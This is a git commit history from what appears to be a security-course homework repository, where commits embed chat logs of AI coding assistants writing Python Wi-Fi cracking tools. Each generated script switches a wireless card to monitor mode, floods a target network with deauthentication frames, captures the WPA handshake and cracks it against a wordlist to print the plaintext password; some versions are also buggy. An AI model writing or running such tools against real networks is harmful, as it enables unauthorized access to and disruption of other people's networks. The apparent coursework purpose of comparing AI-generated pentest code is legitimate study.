david/gensec-westgate-djw2
Archived
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
63 Commits 1 Branch 0 Tags 1,004 KiB
293d8be4b9
Commit Graph

9 Commits

Author SHA1 Message Date
David Westgate
293d8be4b9 aider: Implemented wifi penetration testing application. 
# Aider chat conversation:

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name (SSID) of a password protected wifi network and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application may utilize a wordlist found at ~/rockyou.txt

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/gemini/app.py

ASSISTANT: ```python
hw7/gemini/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time

def change_to_monitor_mode(interface):
    """Changes the given interface to monitor mode."""
    subprocess.run(["sudo", "airmon-ng", "start", interface])

def change_to_managed_mode(interface):
    """Changes the given interface to managed mode."""
    subprocess.run(["sudo", "airmon-ng", "stop", interface])

def get_wifi_interfaces():
    """Returns a list of available wifi interfaces."""
    output = subprocess.run(["iwconfig"], capture_output=True).stdout.decode()
    interfaces = re.findall(r"(\w+)\s+IEEE", output)
    return interfaces

def get_target_network(interfaces):
    """Prompts the user to choose a target network from a list of scanned networks."""
    print("Scanning for networks...")
    process = subprocess.Popen(["sudo", "airodump-ng", "--band", "bg", "-w", "scan", interfaces[0]], stdout=subprocess.PIPE)
    time.sleep(5)  # Scan for a few seconds
    process.terminate()
    output = process.communicate()[0].decode()
    networks = re.findall(r"(\s+)([0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2})\s+(-[0-9]+)\s+([0-9]+)\s+([0-9]+)\s+([0-9]+)\s+(-\w+)\s+([0-9]+)\s+([0-9]+)\s+([0-9]+)\s+(.*)", output)
    if networks:
        print("Available networks:")
        for i, network in enumerate(networks):
            print(f"{i+1}. {network[-1]} (BSSID: {network[1]})")
        choice = int(input("Choose target network: ")) - 1
        return networks[choice]
    else:
        print("No networks found.")
        return None

def capture_handshake(target_network, interface):
    """Captures the handshake of the target network."""
    bssid = target_network[1]
    channel = target_network[3]
    subprocess.Popen(["sudo", "airodump-ng", "--bssid", bssid, "--channel", channel, "--write", "capture", interface], stdout=subprocess.DEVNULL)
    print(f"Capturing handshake for {target_network[-1]} (BSSID: {bssid})...")
    try:
        while True:
            subprocess.run(["sudo", "aireplay-ng", "--deauth", "0", "-a", bssid, interface])
            time.sleep(5)
    except KeyboardInterrupt:
        print("Handshake capture stopped.")

def crack_password(capture_file, wordlist):
    """Cracks the password of the captured handshake using the given wordlist."""
    print("Cracking password...")
    try:
        output = subprocess.run(["sudo", "aircrack-ng", "-w", wordlist, capture_file], capture_output=True).stdout.decode()
        password = re.search(r"KEY FOUND!\s+\[(.*)\]", output)
        if password:
            return password.group(1)
        else:
            return None
    except FileNotFoundError:
        print(f"Wordlist not found: {wordlist}")
        return None

if __name__ == "__main__":
    interfaces = get_wifi_interfaces()
    if interfaces:
        interface = interfaces[0]  # Use the first interface for now
        change_to_monitor_mode(interface)
        target_network = get_target_network(interfaces)
        if target_network:
            capture_handshake(target_network, interface)
            password = crack_password("capture-01.cap", "~/rockyou.txt")
            if password:
                print(f"Password found: {password}")
            else:
                print("Password not found.")
        change_to_managed_mode(interface)
    else:
        print("No wifi interfaces found.")
>>>>>>> REPLACE
```
 2024-05-30 14:38:12 -07:00
David Westgate
98312c9418 reset apps 2024-05-30 14:36:40 -07:00
David Westgate
b4933a8cc6 add photos, update readme 2024-05-30 14:20:14 -07:00
David Westgate
c01a88f305 aider: Created a Python application to assist in WiFi penetration testing. 
# Aider chat conversation:

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected wifi netw

ork BSSID and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwco

nfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/claude/app.py

ASSISTANT: Here is the *SEARCH/REPLACE* block to create the requested Python application in a new file `hw7/claude/app.py`:

hw7/claude/app.py
```python
<<<<<<< SEARCH
=======
import subprocess
import threading

def run_command(command):
    process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    output, error = process.communicate()
    return output.decode('utf-8'), error.decode('utf-8')

def change_mode(interface, mode):
    run_command(f"sudo ifconfig {interface} down")
    run_command(f"sudo iwconfig {interface} mode {mode}")
    run_command(f"sudo ifconfig {interface} up")

def start_monitor_mode(interface):
    change_mode(interface, "monitor")

def stop_monitor_mode(interface):
    change_mode(interface, "managed")

def crack_password(cap_file, wordlist, bssid):
    command = f"sudo aircrack-ng -w {wordlist} -b {bssid} {cap_file}"
    output, error = run_command(command)
    if "KEY FOUND!" in output:
        return output.split("KEY FOUND! [ ")[1].split(" ]")[0]
    else:
        return None

def main():
    interface = "wlan0"
    bssid = input("Enter the BSSID of the target network: ")
    wordlist = "rockyou.txt"
    cap_file = "capture.cap"

    print("[*] Enabling monitor mode...")
    start_monitor_mode(interface)

    print("[*] Starting packet capture...")
    capture_thread = threading.Thread(target=run_command, args=(f"sudo airodump-ng -w {cap_file} --bssid {bssid} {interface}",))
    capture_thread.start()

    print("[*] Performing deauthentication attack...")
    run_command(f"sudo aireplay-ng -0 10 -a {bssid} {interface}")

    capture_thread.join(timeout=60)

    print("[*] Cracking password...")
    password = crack_password(f"{cap_file}-01.cap", wordlist, bssid)

    print("[*] Disabling monitor mode...")
    stop_monitor_mode(interface)

    if password:
        print(f"[+] Password found: {password}")
    else:
        print("[-] Password not found.")

if __name__ == "__main__":
    main()
>>>>>>> REPLACE
```

This Python script does the following:

1. Prompts the user for the BSSID of the target Wi-Fi network.
2. Enables monitor mode on the wireless interface using `iwconfig`.
3. Starts capturing packets from the target network using `airodump-ng` in a separate thread.
4. Performs a deauthentication attack on the target network using `aireplay-ng` to force clients to reconnect and capture the handshake.
5. Waits for the packet capture to complete (timeout of 60 seconds).
6. Attempts to crack the captured handshake using `aircrack-ng` and a wordlist.
7. Disables monitor mode on the wireless interface.
8. Prints the cracked password if found, or a message if not found.

The script uses a combination of `iwconfig`, `airodump-ng`, `aireplay-ng`, and `aircrack-ng` tools to perform the Wi-Fi penetration testing tasks. It assumes these tools are available on the user's Linux system.

Please note that this script is for educational purposes only and should be used responsibly and with proper authorization.
 2024-05-30 14:17:47 -07:00
David Westgate
6767b5f55d aider: Fixed crack_password function to include the 'bssid' parameter for password cracking. 
# Aider chat conversation:

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected wifi network BSSID and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/gpt4/app.py

ASSISTANT: Please add the file `hw7/gpt4/app.py` to the chat so I can proceed with the implementation.

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected wifi network BSSID and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/gpt4/app.py

ASSISTANT: Here is the implementation for the requested Python application:

hw7/gpt4/app.py
```python
<<<<<<< SEARCH
=======
import os
import subprocess
import threading

def run_command(command):
    """Run a shell command with sudo and return the output."""
    result = subprocess.run(['sudo'] + command, capture_output=True, text=True)
    return result.stdout

def change_mode(interface, mode):
    """Change the mode of the wifi interface."""
    run_command(['ifconfig', interface, 'down'])
    run_command(['iwconfig', interface, 'mode', mode])
    run_command(['ifconfig', interface, 'up'])

def start_monitor_mode(interface):
    """Start monitor mode on the specified interface."""
    run_command(['airmon-ng', 'start', interface])

def stop_monitor_mode(interface):
    """Stop monitor mode on the specified interface."""
    run_command(['airmon-ng', 'stop', interface])

def capture_handshake(interface, bssid, channel):
    """Capture the handshake for the specified BSSID."""
    run_command(['airodump-ng', '--bssid', bssid, '--channel', channel, '-w', 'capture', interface])

def deauthenticate(interface, bssid, client):
    """Deauthenticate a client to capture the handshake."""
    run_command(['aireplay-ng', '--deauth', '0', '-a', bssid, '-c', client, interface])

def crack_password(cap_file, wordlist):
    """Crack the password using aircrack-ng."""
    result = run_command(['aircrack-ng', '-w', wordlist, '-b', bssid, cap_file])
    return result

def main():
    interface = input("Enter the name of your wifi interface: ")
    bssid = input("Enter the BSSID of the target network: ")
    channel = input("Enter the channel of the target network: ")
    wordlist = input("Enter the path to your wordlist: ")

    # Change to monitor mode
    change_mode(interface, 'monitor')
    start_monitor_mode(interface)

    # Capture handshake
    capture_thread = threading.Thread(target=capture_handshake, args=(interface, bssid, channel))
    capture_thread.start()

    # Deauthenticate clients
    deauth_thread = threading.Thread(target=deauthenticate, args=(interface, bssid, 'FF:FF:FF:FF:FF:FF'))
    deauth_thread.start()

    capture_thread.join()
    deauth_thread.join()

    # Crack password
    password = crack_password('capture-01.cap', wordlist)
    print(f"The password is: {password}")

    # Change back to managed mode
    stop_monitor_mode(interface)
    change_mode(interface, 'managed')

if __name__ == "__main__":
    main()
>>>>>>> REPLACE
```

USER:
# Fix any errors below, if possible.

## Running: flake8 --select=E9,F821,F823,F831,F406,F407,F701,F702,F704,F706 --show-source hw7/gpt4/app.py

hw7/gpt4/app.py:34:64: F821 undefined name 'bssid'
    result = run_command(['aircrack-ng', '-w', wordlist, '-b', bssid, cap_file])
                                                               ^

## See relevant line below marked with █.

/home/kali/Documents/djw2/gensec/gensec-westgate-djw2/hw7/gpt4/app.py:
...⋮...
 31│
 32│def crack_password(cap_file, wordlist):
 33│    """Crack the password using aircrack-ng."""
 34█    result = run_command(['aircrack-ng', '-w', wordlist, '-b', bssid, cap_file])
 35│    return result
 36│
 37│def main():
...⋮...

ASSISTANT: To fix the error, we need to pass the `bssid` parameter to the `crack_password` function. Here are the necessary changes:

hw7/gpt4/app.py
```python
<<<<<<< SEARCH
def crack_password(cap_file, wordlist):
=======
def crack_password(cap_file, wordlist, bssid):
>>>>>>> REPLACE
```

hw7/gpt4/app.py
```python
<<<<<<< SEARCH
    password = crack_password('capture-01.cap', wordlist)
=======
    password = crack_password('capture-01.cap', wordlist, bssid)
>>>>>>> REPLACE
```
 2024-05-30 13:59:52 -07:00
David Westgate
7dde8a9e64 Added functions to change wifi interface mode, start/stop monitor mode, capture handshake, deauthenticate clients, and crack password using aircrack-ng. 2024-05-30 13:59:52 -07:00
David Westgate
1cb09832a3 aider: Added a python application to assist in wifi penetration testing. 
# Aider chat conversation:

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected
wifi network BSSID and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limite
d to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/prompt0/app.py

ASSISTANT: ```python
hw7/prompt0/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time

def change_to_monitor_mode(interface: str) -> None:
    """
    Change the given interface to monitor mode.
    """
    subprocess.run(["sudo", "airmon-ng", "start", interface])

def change_to_managed_mode(interface: str) -> None:

USER: ```python
hw7/prompt0/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time

def change_to_monitor_mode(interface: str) -> None:
    """
    Change the given interface to monitor mode.
    """
    subprocess.run(["sudo", "airmon-ng", "start", interface])

def change_to_managed_mode(interface: str) -> None:

^^^ Incomplete SEARCH/REPLACE block.

ASSISTANT: ```python
hw7/prompt0/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time

def change_to_monitor_mode(interface: str) -> None:
    """
    Change the given interface to monitor mode.
    """
    subprocess.run(["sudo", "airmon-ng", "start", interface])

def change_to_managed_mode(interface: str) -> None:
    """
    Change the given interface to managed mode.
    """
    subprocess.run(["sudo", "airmon-ng", "stop", interface])

def get_bssid(essid: str) -> str:
    """
    Get the BSSID of the given ESSID.
    """
    process = subprocess.Popen(["sudo", "iwconfig"], stdout=subprocess.PIPE)
    output, error = process.communicate()
    output = output.decode("utf-8")
    match = re.search(r"ESSID:\"({})\"".format(essid), output)
    if match:
        return match.group(1)
    else:
        return None

def capture_handshake(bssid: str, interface: str) -> None:
    """
    Capture the handshake of the given BSSID.
    """
    subprocess.Popen(["sudo", "airodump-ng", "--bssid", bssid, "--channel", "6", "-w", "capture", interface], stdout=subprocess.PIPE)
    time.sleep(5)
    subprocess.run(["sudo", "aireplay-ng", "--deauth", "0", "-a", bssid, interface])
    time.sleep(10)
    subprocess.run(["sudo", "killall", "airodump-ng"])

def crack_handshake(capture_file: str, wordlist: str) -> str:
    """
    Crack the handshake in the given capture file.
    """
    process = subprocess.Popen(["sudo", "aircrack-ng", "-w", wordlist, capture_file], stdout=subprocess.PIPE)
    output, error = process.communicate()
    output = output.decode("utf-8")
    match = re.search(r"KEY FOUND! \[(.*)\]", output)
    if match:
        return match.group(1)
    else:
        return None

if __name__ == "__main__":
    essid = input("Enter the ESSID: ")
    interface = input("Enter the interface: ")
    wordlist = input("Enter the path to the wordlist: ")

    change_to_monitor_mode(interface)
    bssid = get_bssid(essid)
    if bssid:
        print(f"BSSID: {bssid}")
        capture_handshake(bssid, interface)
        password = crack_handshake("capture-01.cap", wordlist)
        if password:
            print(f"Password: {password}")
        else:
            print("Password not found.")
    else:
        print("ESSID not found.")

    change_to_managed_mode(interface)
>>>>>>> REPLACE
```
 2024-05-30 13:08:10 -07:00
David Westgate
598cb778d5 update readme, gitignore 2024-05-29 16:37:18 -07:00
David Westgate
aac3eb1153 initial commit for hw7 2024-05-27 10:53:13 -07:00